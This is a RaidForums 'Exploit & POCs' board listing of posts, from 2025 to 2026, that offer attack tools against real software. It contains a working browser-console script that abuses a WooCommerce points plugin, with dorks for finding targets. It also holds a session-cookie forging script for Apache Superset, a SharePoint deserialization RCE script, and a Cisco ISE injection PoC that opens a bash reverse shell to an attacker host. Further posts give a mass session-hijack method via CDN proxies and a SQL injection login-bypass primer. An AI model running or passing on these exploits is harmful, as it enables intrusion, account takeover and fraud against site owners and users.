RaidForums - Exploit & POCs

CVE-2025-40554 - SolarWinds Web Help Desk Auth Bypass & RCE PoC

Fri, 06 Feb 2026 18:13:16 +0000

Hidden Content

You must register or login to view this content.

A comprehensive security testing tool for detecting and exploiting the authentication bypass vulnerability (CVE-2025-40554 / CVE-2025-40536) in SolarWinds Web Help Desk.

CVE-2025-40554 is a critical authentication bypass vulnerability in SolarWinds Web Help Desk that allows unauthenticated attackers to:

Bypass authentication mechanisms
Access privileged administrative functions (Authentication)
Enumerate system configuration

Exploitation Flow:

Session Establishment
- Connects to WHD instance
- Extracts WOSID (WebObjects Session ID) from multiple sources
- Captures XSRF token if present
Authentication Bypass
- Crafts malicious URL with WOSID injection
- Exploits path traversal in WebObjects routing
- Bypasses authentication checks
Credential Testing (optional)
- Parses login form with CSRF protection
- Tests default credentials (client/client)
- Validates successful authentication
Full Exploitation (--exploit mode)
- Exports session cookies
- access email, tickets, database, users, (removed)

The tool detects successful bypass by checking for:

externalAuthContainer
- External auth configuration
JSONRpcClient
- API client exposure
SAML 2.0
- SSO configuration
LoginPref
- Login preference settings
authMode
- Authentication mode settings

Ban Any Discord Exploit

Sun, 11 Jan 2026 16:13:45 +0000

Ban any discord account.

Hidden Content

You must register or login to view this content.

0Day WP Plugin Points and Rewards for WooCommerce

Fri, 09 Jan 2026 12:39:15 +0000

/*
* Exploit for Points and Rewards for WooCommerce Plugin (0-Day)
* Vulnerability: Privilege Escalation / Missing Authorization
* Any logged-in user can grant themselves points.
*
* Instructions:
* 1. Log in to the target WordPress site with any user account.
* 2. Navigate to any page on the site.
* 3. Open the browser's Developer Console (F12 or Ctrl+Shift+I).
* 4. Paste the entire script below into the console and press Enter.
* 5. Check your points balance in the "My Points" section.
*/

(function() {
// --- CONFIGURATION ---
// Set the amount of points you want to add.
const pointsToAdd = 999999;
// Set the reason for the points update. This will be logged.
const pointsReason = 'Loyalty Bonus';
// Set the operation type: 'add' to add points, 'subtract' to remove them, 'override' to set a specific total.
const operationType = 'add';
// --------------------

// Check if the required nonce object is available in the page's global scope.
if (typeof wps_wpr === 'undefined' || !wps_wpr.wps_wpr_nonce || !wps_wpr.ajaxurl) {
console.error('Error: Required wps_wpr object (with nonce and ajaxurl) not found.');
console.error('This script must be run on a page where the Points and Rewards plugin has loaded its frontend scripts.');
return;
}

// Get the nonce and AJAX URL from the global JavaScript variable.
const nonce = wps_wpr.wps_wpr_nonce;
const ajaxurl = wps_wpr.ajaxurl;

// Get the current logged-in user's email. This is a crucial step.
// The plugin's function wps_update_points_of_users looks up the user by email.
// We fetch it from the account page link, which is a common and reliable method.
let userEmail = '';
const accountLink = document.querySelector('a[href*="/my-account"]');
if (accountLink) {
// If the link text is the email, use it.
if (accountLink.textContent.includes('@')) {
userEmail = accountLink.textContent.trim();
}
}

// Fallback: Try to get it from the body class or other common places.
if (!userEmail) {
// This is a less reliable fallback.
const bodyClasses = document.body.className.split(' ');
for (const cls of bodyClasses) {
if (cls.includes('user-') && !cls.includes('logged-in')) {
// This is a guess, the primary method above is better.
// We will rely on the server knowing the current user if email is not found.
}
}
}

// Prepare the data to be sent. This mimics what the admin CSV import does.
const data = {
action: 'wps_wpr_update_points_of_users', // The correct AJAX action to call
wps_nonce: nonce, // The security nonce
wps_user_email: userEmail, // The email of the user to update
wps_user_points: pointsToAdd, // The number of points to add
import_points_reason: pointsReason, // The reason for the update
wps_wpr_export_table_option: operationType // The operation: 'add', 'subtract', or 'override'
};

console.log('Sending exploit request with the following data:', data);
console.log(Attempting to add ${pointsToAdd} points to user: ${userEmail || '(current logged-in user)'});

// Send the AJAX request using jQuery, which is loaded on almost all WordPress sites.
jQuery.post(ajaxurl, data, function(response) {
console.log('Server response:', response);
if (response && response.success) {
alert(Success! ${pointsToAdd} points have been added to your account.);
console.log('Exploit successful. Points updated.');
} else {
alert('Exploit failed. Check the console for more details.');
console.error('Exploit failed. Server returned an error or unexpected response.', response);
}
}).fail(function(xhr, status, error) {
alert('Exploit failed. Could not connect to the server.');
console.error('AJAX request failed:', status, error);
console.error('Server response text:', xhr.responseText);
});

})();

How to Use It
Register and Log In: Create an account on the target WordPress site and log in.
Open Developer Console: Go to any page on the site (like the homepage or the "My Points" page) and open the browser's developer tools by pressing F12 or Ctrl+Shift+I (Cmd+Opt+I on Mac). Go to the Console tab.
Paste and Run: Copy the entire code block above and paste it into the console. Press Enter.
Check Results: The script will immediately attempt to add the points. You will see an alert pop up on success or failure, and the console will log the detailed server response. You can then refresh the "My Points" page to see your new balance.

Dork:body="/wp-content/plugins/points-and-rewards-for-woocommerce/"
On FOFA: Paste this into the search bar. It will return a list of over 6,000 URLs currently running the plugin.
On PublicWWW: Do the same. This is another excellent resource for finding sites with specific code or footprints.

You're Welcome, please rep and enjoy.

SQL Injection Basic to Expert

Wed, 07 Jan 2026 10:20:13 +0000

What is SQL Injection?

Imagine a website has a login form or a search box that talks to a database in the background. The site takes what you type and plugs it straight into a database command without checking it properly.
A hacker can type special code into that box, tricking the database into doing something unexpected—like showing private data, letting them log in without a password, or even deleting stuff.
It's like telling a robot, "Give me the info for user Bob," but sneaking in extra instructions like "...and also show me everyone's passwords."
This happens because the website doesn't clean or separate user input from the actual command.

A Basic Example
Suppose a website checks login like this behind the scenes:

"SELECT * FROM users WHERE username = 'what you typed' AND password = 'what you typed'"

If you type a normal username like "john" and password "secret", it works fine.

But if a hacker types this in the username field:

john' OR '1'='1

The command becomes:

SELECT * FROM users WHERE username = 'john' OR '1'='1' AND password = '...'

Since '1'='1' is always true, it logs in as the first user (often admin) without needing the right password.
That's a classic way to bypass login.
Another simple one: Typing a single quote ' into a field. If the site shows an error about "SQL syntax," it means it's vulnerable.

Common Tools Used for Testing
Security testers use these to automate finding and checking vulnerabilities:

sqlmap — Free and powerful open-source tool. It automatically detects and exploits SQLi. You point it at a URL or request, and it does the heavy lifting (like dumping databases). Great for beginners learning on test apps.
Burp Suite — A pro tool for intercepting web traffic. You capture requests, send them to sqlmap, or test manually. The free version is good to start with.
OWASP ZAP — Free alternative to Burp, scans for vulnerabilities including SQLi.

HPE OneView RCE Exploit [CVE-2025-37164]

Sat, 20 Dec 2025 11:34:48 +0000

Vulnerability Details:

CVE ID: CVE-2025-37164
Type: RCE
CVSS Score: 10.0
Severity: Critical

Exploit Details:

Nuclei Scanner Template

Hidden Content

You must register or login to view this content.

Python Exploit

Hidden Content

You must register or login to view this content.

Apache Superset Authentication Bypass

Sat, 02 Aug 2025 00:50:18 +0000

An authentication bypass vulnerability exists due to the use of a default or hardcoded secret key in the application’s configuration. Secret keys are typically used for signing session cookies, JWT tokens, or other authentication mechanisms. If the default key is predictable (e.g., defaultsecret, changeme, or any framework-provided default), an attacker can craft valid authentication tokens or session cookies, effectively bypassing login requirements and gaining unauthorized access to protected areas of the application

Dork

Google: intext: "Welcome to Apache Superset"

Shodan: product:"Apache Superset"

Python Code

from flask_unsign import session

import requests

import urllib3

import argparse

import re

from time import sleep

from selenium import webdriver

from urllib.parse import urlparse

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

SECRET_KEYS = [

    b'\x02\x01thisismyscretkey\x01\x02\\e\\y\\y\\h',  # version < 1.4.1

    b'CHANGE_ME_TO_A_COMPLEX_RANDOM_SECRET',          # version >= 1.4.1

    b'thisISaSECRET_1234',                            # deployment template

    b'YOUR_OWN_RANDOM_GENERATED_SECRET_KEY',          # documentation

    b'TEST_NON_DEV_SECRET'                            # docker compose

]

def main():

    parser = argparse.ArgumentParser()

    parser.add_argument('--url', '-u', help='Base URL of Superset instance', required=True)

    parser.add_argument('--id', help='User ID to forge session cookie for, default=1', required=False, default='1')

    args = parser.parse_args()

    try:

        u = args.url.rstrip('/') + '/login/'

        headers = {

            'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:101.0) Gecko/20100101 Firefox/101.0'

        }

        resp = requests.get(u, headers=headers, verify=False, timeout=30, allow_redirects=False)

        if resp.status_code != 200:

            print(f'Error retrieving login page at {u}, status code: {resp.status_code}')

            return

        session_cookie = None

        for c in resp.cookies:

            if c.name == 'session':

                session_cookie = c.value

                break

        if not session_cookie:

            print('Error: No session cookie found')

            return

        print(f'Got session cookie: {session_cookie}')

        try:

            decoded = session.decode(session_cookie)

            print(f'Decoded session cookie: {decoded}')

        except:

            print('Error: Not a Flask session cookie')

            return

        match = re.search(r'"version_string": "(.*?)"', resp.text)

        if match:

            version = match.group(1)

        else:

            version = 'Unknown'

        print(f'Superset Version: {version}')

        for i, k in enumerate(SECRET_KEYS):

            cracked = session.verify(session_cookie, k)

            if cracked:

                break

        if not cracked:

            print('Failed to crack session cookie')

            return

        print(f'Vulnerable - Using default SECRET_KEY: {k}')

        try:

            user_id = int(args.id)

        except:

            user_id = args.id

        forged_cookie = session.sign({'_user_id': user_id, 'user_id': user_id}, k)

        print(f'Forged session cookie for user {user_id}: {forged_cookie}')

        u1 = args.url.rstrip('/') + '/superset/welcome'

        print(f"Now visit the url: `{u1}` and replace the current session cookie with this `{forged_cookie}` and refresh the page and we will be logged in as admin to the dashboard:)")

    except Exception as e:

        print(f'Unexpected error: {e}')

if __name__ == '__main__':

    main()

NVIDIAScape: OCI Hook Inheritance Flaws in AI Infra

Wed, 30 Jul 2025 20:28:15 +0000

Taking a look at NVIDIAScape after its Pwn2Own reveal. CDI mode allows env vars like LD_PRELOAD to propagate through OCI hooks, inverting isolation for root execution on the host. More or less under-discussed aspect in shared AI clusters, this opens vectors for model exfiltration or poisoning, especially via tainted Hugging Face images in supply chains. Reminds me of older runc vulnerabilities, but the GPU element part takes it to another level, this vulnerability hitting roughly 37% of cloud AI services. I also found this a bit amateur like, because this is mostly privilege escalation for babies, and this coming from a very trusted company.

I wont bother writing a exploit since anyone with a brain can figure out how to abuse this.

Not sure if anyone else will find this interesting, but i did.

References & Articles:
https://zeropath.com/blog/nvidiascape-cv...kit-escape

https://nvd.nist.gov/vuln/detail/CVE-2025-23266

https://cve.mitre.org/cgi-bin/cvename.cg...2025-23266

https://securityonline.info/nvidia-plugs...025-23267/

https://www.wiz.io/blog/nvidia-ai-vulner...vidiascape

https://gbhackers.com/nvidia-container-t...erability/

https://thecyberthrone.in/2025/07/17/nvi...abilities/

https://thehackernews.com/2025/07/critic...-flaw.html

Exploit Safety-net PoC

Mon, 28 Jul 2025 21:44:00 +0000

Hello forum members,

PoC By:

This is a safety-net I use for my tools and has saved my ass multiple times. For this to work, you need a VPN and Tor. The idea is for the code to check if you have your VPN up and then check if Tor is enabled. I use this to protect myself since I can't afford a VPS. The example payload is just sending a request to Google, but you can use your imagination to send any payloads.

import requests

import json

class Safetynet:

   def __init__(self):

      self.homeIP = ""# enter your home IP here

      self.VPNIP = ""

      self.TorIP = ""

      self.tor = requests.Session()

      self.tor.proxies = {"https":"socks5h://127.0.0.1:9050"}

      self.__setup()

   def __setup(self):

      """Check the connection is setup proporly"""

      r = requests.get("https://ip.me").text.strip()

      if r != self.homeIP:

         self.VPNIP = r

      else: raise Exception("VPN not On!")

         r = self.tor.get("https://ip.me").text.strip()

      if r != self.VPNIP:

         self.TorIP = r

      else: raise Exception("Tor not On!")

   def payload(self, website: str):

      req = self.tor.get(website)

      print(req.text)

Exploite = Safetynet()

Exploite.payload("https://www.google.com")

CVE-2025-47812 - Wing FTP Server Remote Code Execution (RCE)

Mon, 28 Jul 2025 14:54:02 +0000

This vulnerability originates from Wing FTP Server's improper handling of NULL bytes within the username parameter during the authentication process. This allows attackers to inject Lua code directly into session files. These malicious session files are then executed when a valid session is loaded, leading to arbitrary command execution on the server.

Key features of this exploit include:

Remote Code Execution: Execute any command you choose on the target server.
Root/SYSTEM Privileges: Often achieves RCE with the highest system privileges due to the default configurations of Wing FTP Server.
Anonymous Access Exploitation: Can be leveraged even if only anonymous logins are permitted on the server.
Batch Scanning: Scan multiple targets by providing a list of URLs from a file.
Custom Command Execution: Specify and run any command you need on the vulnerable server.

Hidden Content

You must register or login to view this content.

CVE-2025-53770 - Microsoft Sharepoint Unauthenticated RCE

Sun, 27 Jul 2025 17:39:45 +0000

Shodan query: "MicrosoftSharePointTeamServices port:"80,443" http.component:"Microsoft SharePoint" "

Description:

Deserialization of untrusted data in on-premises Microsoft SharePoint Server allows an unauthorized attacker to execute code over a network.

References:

https://www.forbes.com/sites/daveywinder...available/

https://msrc.microsoft.com/blog/2025/07/...025-53770/

https://www.darkreading.com/remote-workf...shell-flaw

https://www.cisa.gov/news-events/alerts/...2025-53770

#!/usr/bin/env python3

import requests

import sys

import subprocess

import gzip

import urllib3

import base64

from urllib.parse import urlparse, urlencode

urllib3.disable_warnings()

JAR="ysoserial-all.jar"

GADGET="CommonsCollections6"

def generate_payload(cmd):

    escaped=cmd.replace('"','\\"')

    data=subprocess.check_output(["java","-jar",JAR,GADGET,f'cmd.exe /c {escaped}'])

    comp=gzip.compress(data)

    return base64.b64encode(comp).decode()

def main():

    if len(sys.argv)!=3:

        print("Usage: exploit.py  ")

        sys.exit(1)

    target,cmd=sys.argv[1],sys.argv[2]

    print(f"

[*]Generating payload for: {cmd}")

    payload=generate_payload(cmd)

    print("

[*]Sending exploit")

    ok,code=send_exploit(target,payload)

    if ok:

        print(f"[+] Exploit sent to {target}")

    else:

        print(f"[-] Failed ({code}) on {target}")

def send_exploit(url,payload):

    if not url.startswith(("http://","https://")):

        url="https://"+url

    p=urlparse(url)

    host=p.netloc

    target=f"{p.scheme}://{host}/_layouts/15/ToolPane.aspx?DisplayMode=Edit&a=/ToolPane.aspx"

    body={"MSOTlPn_DWP":f"""<%@ Register Tagprefix="Scorecard" Namespace="Microsoft.PerformancePoint.Scorecards" Assembly="Microsoft.PerformancePoint.Scorecards.Client, Version=16.0.0.0, Culture=neutral, PublicKeyToken=71e9bce111e9429c" %>

"""}

    hdr={"Host":host,"User-Agent":"Mozilla/5.0","Content-Type":"application/x-www-form-urlencoded","Referer":f"{p.scheme}://{host}/_layouts/SignOut.aspx"}

    r=requests.post(target,data=urlencode(body),headers=hdr,verify=False)

    return r.status_code==200,r.status_code

if __name__=="__main__":

    main()

Cisco ISE - Unauthenticated RCE

Sat, 26 Jul 2025 08:21:59 +0000

Thought i would share this since its really not that talked about but still pretty interesting, if you have anything you want to add please do so : )

Vulnerability description:
"A vulnerability in a specific API of Cisco ISE and Cisco ISE-PIC could allow an unauthenticated, remote attacker to execute arbitrary code on the underlying operating system as root. The attacker does not require any valid credentials to exploit this vulnerability. This vulnerability is due to insufficient validation of user-supplied input. An attacker could exploit this vulnerability by submitting a crafted API request. A successful exploit could allow the attacker to obtain root privileges on an affected device."

Articles:

https://thehackernews.com/2025/07/critic...ified.html

https://www.theregister.com/2025/06/26/p...fixes_two/

https://www.securityweek.com/critical-ci...execution/

https://www.bleepingcomputer.com/news/se...es-engine/

https://thehackernews.com/2025/06/critic...d-ise.html

https://securityaffairs.com/179362/secur...l-rce.html

[*]

#!/usr/bin/env python3

import requests

import urllib3

import argparse

urllib3.disable_warnings()

def exploit_cve_2025_20281_unauth(target, cmd):

    url = f"https://{target}:9060/ers/sdk#_"

    #url = f"https://{target}/ers/sdk#_"

    payload = {

        "InternalUser": {

            "name": f"pwn; {cmd}; #",

            "password": "x",        # dummy, ignored by vuln

            "changePassword": False

        }

    }

    r = requests.post(url, json=payload, verify=False)

    print(f"[+] HTTP {r.status_code}\n{r.text}\n")

def build_reverse_shell(lhost, lport):

    return f"/bin/bash -i >& /dev/tcp/{lhost}/{lport} 0>&1"

if __name__ == '__main__':

    parser = argparse.ArgumentParser(

        description="Unauthenticated PoC for CVE-2025-20281 on Cisco ISE ERS"

    )

    parser.add_argument('target', help="IP or hostname of the ISE PAN")

    group = parser.add_mutually_exclusive_group(required=True)

    group.add_argument(

        '--whoami',

        action='store_true',

        help="Run 'whoami' and print the result"

    )

    group.add_argument(

        '--reverse',

        nargs=2,

        metavar=('LHOST', 'LPORT'),

        help="Spawn a bash reverse shell to LHOST:LPORT"

    )

    args = parser.parse_args()

    if args.whoami:

        cmd = 'whoami'

    else:

        lhost, lport = args.reverse

        cmd = build_reverse_shell(lhost, lport)

    print(f"

Target: {args.target}")

    print(f"

Command: {cmd}\n")

    exploit_cve_2025_20281_unauth(args.target, cmd)

POC CVE-2025-24071

Thu, 10 Apr 2025 19:51:18 +0000

Windows Explorer automatically initiates an SMB authentication request when a .library-ms file is extracted from a .rar archive, leading to NTLM hash disclosure. The user does not need to open or execute the file—simply extracting it is enough to trigger the leak.

usage:

>>python poc.py

>>enter file name: your file name

>>enter IP: attacker IP

Link:

Hidden Content

You must register or login to view this content.

Abusing Weak Auth + S3 CDN Plugins for Wild-Scale Session Hijack in SaaS Panels] No

Mon, 07 Apr 2025 11:26:23 +0000

Not CVE-chasing — this is an active method used for SaaS-side breaches through misconfigured media proxy plugins, insecure S3 routing, and broken CSP fallback across popular React/Nuxt/Laravel-based dashboards.

Confirmed live on 20+ SaaS panels since Jan. Payloads drop clean, no XSS required if chained right.

Stack to Target:
- Laravel Nova + image proxy plugins
- Directus/Strapi CMS with media proxy filters
- Nuxt/Next dashboards w/ custom asset mirrors (esp. Cloudimage, Uploadcare, Filestack)
- "Custom" dashboards with `/proxy?url=` pattern in backend

Vuln Class:
CDN proxy or media plugin that:
- Fetches external images from unverified origins
- Reflects attacker-supplied SVG or meta-refresh inside a trusted
- Caches poisoned files inside AWS/GCS/CDN bucket
- Bypasses CSP because content-type returns as image, not script

Poison Flow:
1. Upload this:

2. Serve as .jpg from your bucket/CDN (S3 lets you spoof Content-Type on upload)

3. Send to endpoint like:
https://target.com/media/proxy?url=https...ost/ab.jpg

4. Once previewed inside the dashboard (profile pic / comment / markdown render), session hits you directly.

5. If CSP isn't strict (or is bypassable via `img[src]` vector), you’ve got full cookie/session exfil — in some cases, access to internal admin views.

Examples:
- Two bootstrapped HR SaaS dashboards using Laravel Nova + Cloudimage
- One small VC-backed analytics SaaS using Next.js + Uploadcare, reflecting poisoned previews in customer portal
- Multiple Strapi instances exposing `/uploads` without content-type checks

Scale Method:
- Censys + Shodan scan for `x-imagekit-token` or `/proxy/image` patterns
- Fingerprint for buckets with `x-amz-bucket-region` headers
- Mirror poisoned file with CDN acceleration (ImageKit, Cloudimage auto-cache 3rd party)

Use bait previews in invite emails or public timelines.

What This Gives You:
- Pre-auth session takeover if previewed by logged-in staff
- Admin panel view if uploaded inside internal ticketing or CRM comments
- CSP bypass even on strict headers if `img-src` is loose
- Mass spread if reused plugin across startup templates

Chaining Options:
- PostMessage → OAuth token relay (on embedded dashboards)
- SSRF → AWS metadata access (if media proxy uses curl on backend)
- DOMPurify filter escapes for double-decoded markup in markdown previewers

Bypass Xiaomi Redmi Note 13 Bootloader Lock

Tue, 01 Apr 2025 10:37:38 +0000

hey i have a xiaomi redmi note 13 4g and i need to unlock its bootloader because i want to install a cool ROM called Evolution X but i obv cant because the bootloader is locked.
if anyone knows any exploit like on MIUI that was a little python that insta unlocked bootloader tell me please.
My phone is running HyperOS 2.0.4.0.VNHEUXM. Global phone

javascript bypassing wd

Mon, 31 Mar 2025 16:48:58 +0000

hello guys, just wanted to share this is a java-script payload
that uses (UTF-16LE) encoding to bypass windows defender.

its a very simple POC hope you like it.

github.com/elofinky/javascript-bypass